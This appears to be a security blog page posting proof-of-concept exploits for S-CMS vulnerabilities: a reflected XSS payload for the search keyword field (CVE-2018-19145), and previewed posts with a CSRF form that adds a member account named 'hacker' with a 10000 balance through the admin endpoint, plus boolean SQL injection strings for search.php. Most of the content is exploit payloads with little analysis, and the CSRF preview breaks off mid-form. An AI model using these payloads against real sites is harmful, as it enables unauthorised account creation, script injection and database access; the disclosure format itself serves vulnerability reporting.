Skip to main content

The POC of S-CMS(Xss) -CVE-2018-19145

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php   line144

Vulnerable code:  <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>




Comments

Popular posts from this blog

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip CSRF Exp: <!DOCTYPE html> <html> <head>     <meta http-equiv="Content-Type" content="text/html" charset="utf-8" /> </head> <body> <center><h1>fake request</center> <div>     <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">     <input type="hidden" name="M_login" value="hacker">     <input type="hidden" name="M_pwd" value="hacker">     <input type="hidden" name="M_money" value="10000">     <input type="hidden" name="M_fen" value="0">     <input type="hidden" name="M_name" value="1">     <inpu

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip location: S-CMS/search.php line 155 Vulnerable code:  $sql="select * from SL_text where (T_title like '%". $keyword ."%' or T_content like '%". $keyword ."%' ) order by T_id desc"; Exp: %' AND 1=1 AND '%'=' %' AND 1=2 AND '%'=' Attacker can add sql statement in the between of both "and" to query the database.